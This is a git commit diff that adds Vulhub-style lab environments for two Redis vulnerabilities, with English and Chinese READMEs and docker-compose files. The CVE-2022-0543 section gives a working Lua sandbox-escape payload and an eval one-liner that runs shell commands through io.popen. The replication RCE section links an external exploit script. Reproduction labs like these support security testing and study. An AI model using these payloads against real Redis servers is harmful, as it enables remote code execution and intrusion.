first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/redis/4-unacc/1.png
+++ b/redis/4-unacc/1.png
--- a/redis/4-unacc/README.md
+++ b/redis/4-unacc/README.md
@@ -0,0 +1,31 @@
+# Redis Post Exploitation Due to Master and Slave Synchronisation
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache, and message broker.
+
+Redis which version starts from 4.0, prior to 5.0.5, can be exploit through the synchronisation between master and slave by an authenticated visitor.
+
+Reference:
+
+- <https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf>
+
+## Vulnerability Environment
+
+Execute following command to start a Redis server 4.0.14:
+
+```
+docker compose up -d
+```
+
+After server is started, you can connect to this server without credentials by `redis-cli`:
+
+```
+redis-cli -h your-ip
+```
+
+## Exploit
+
+Use [this script](https://github.com/vulhub/redis-rogue-getshell) to execute arbitrary commands:
+
+![](1.png)
--- a/redis/4-unacc/README.zh-cn.md
+++ b/redis/4-unacc/README.zh-cn.md
@@ -0,0 +1,25 @@
+# Redis 4.x/5.x 主从复制导致的命令执行
+
+Redis是著名的开源Key-Value数据库，其具备在沙箱中执行Lua脚本的能力。
+
+Redis未授权访问在4.x/5.0.5以前版本下，我们可以使用master/slave模式加载远程模块，通过动态链接库的方式执行任意命令。
+
+参考链接：
+
+- <https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf>
+
+## 环境搭建
+
+执行如下命令启动redis 4.0.14：
+
+```
+docker compose up -d
+```
+
+环境启动后，通过`redis-cli -h your-ip`即可进行连接，可见存在未授权访问漏洞。
+
+## 漏洞复现
+
+使用[这个POC](https://github.com/vulhub/redis-rogue-getshell)即可直接执行命令：
+
+![](1.png)
--- a/redis/4-unacc/docker-compose.yml
+++ b/redis/4-unacc/docker-compose.yml
@@ -0,0 +1,6 @@
+version: '2'
+services:
+ redis:
+   image: vulhub/redis:4.0.14
+   ports:
+    - "6379:6379"
--- a/redis/CVE-2022-0543/1.png
+++ b/redis/CVE-2022-0543/1.png
--- a/redis/CVE-2022-0543/README.md
+++ b/redis/CVE-2022-0543/README.md
@@ -0,0 +1,53 @@
+# Redis Lua Sandbox Escape and Remote Code Execution (CVE-2022-0543)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache, and message broker.
+
+Reginaldo Silva discovered that due to a packaging issue on Debian/Ubuntu, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host.
+
+References:
+
+- <https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>
+- <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005787>
+
+## Vulnerability Environment
+
+Execute following command to start a redis server 5.0.7 on Ubuntu:
+
+```
+docker compose up -d
+```
+
+After server is started, you can connect to this server without credentials by `redis-cli`:
+
+```
+redis-cli -h your-ip
+```
+
+## Exploit
+
+This vulnerability existed because the Lua library in Debian/Ubuntu is provided as a dynamic library. A `package` variable was automatically populated that in turn permitted access to arbitrary Lua functionality.
+
+As this extended to, for example, you can use `package.loadlib` to load the modules from liblua, then use this module to execute the commands:
+
+```lua
+local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
+local io = io_l();
+local f = io.popen("id", "r");
+local res = f:read("*a");
+f:close();
+return res
+```
+
+Noted that you should specify a correct realpath for the `liblua` library. In this Vulhub environment (Ubuntu focal), the value is `/usr/lib/x86_64-linux-gnu/liblua5.1.so.0`.
+
+Eval this script in redis shell:
+
+```lua
+eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
+```
+
+Execute the commands successful:
+
+![](1.png)
--- a/redis/CVE-2022-0543/README.zh-cn.md
+++ b/redis/CVE-2022-0543/README.zh-cn.md
@@ -0,0 +1,45 @@
+# Redis Lua沙盒绕过命令执行（CVE-2022-0543）
+
+Redis是著名的开源Key-Value数据库，其具备在沙箱中执行Lua脚本的能力。
+
+Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象`package`，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。
+
+参考链接：
+
+- <https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>
+- <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005787>
+
+## 漏洞环境
+
+执行如下命令启动一个使用Ubuntu源安装的Redis 5.0.7服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，我们可以使用`redis-cli -h your-ip`连接这个redis服务器。
+
+## 漏洞复现
+
+我们借助Lua沙箱中遗留的变量`package`的`loadlib`函数来加载动态链接库`/usr/lib/x86_64-linux-gnu/liblua5.1.so.0`里的导出函数`luaopen_io`。在Lua中执行这个导出函数，即可获得`io`库，再使用其执行命令：
+
+```lua
+local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
+local io = io_l();
+local f = io.popen("id", "r");
+local res = f:read("*a");
+f:close();
+return res
+```
+
+值得注意的是，不同环境下的liblua库路径不同，你需要指定一个正确的路径。在我们Vulhub环境（Ubuntu fiocal）中，这个路径是`/usr/lib/x86_64-linux-gnu/liblua5.1.so.0`。
+
+连接redis，使用`eval`命令执行上述脚本：
+
+```lua
+eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
+```
+
+可见命令已成功执行：
+
+![](1.png)
--- a/redis/CVE-2022-0543/docker-compose.yml
+++ b/redis/CVE-2022-0543/docker-compose.yml
@@ -0,0 +1,6 @@
+version: '2'
+services:
+ redis:
+   image: vulhub/redis:5.0.7
+   ports:
+    - "6379:6379"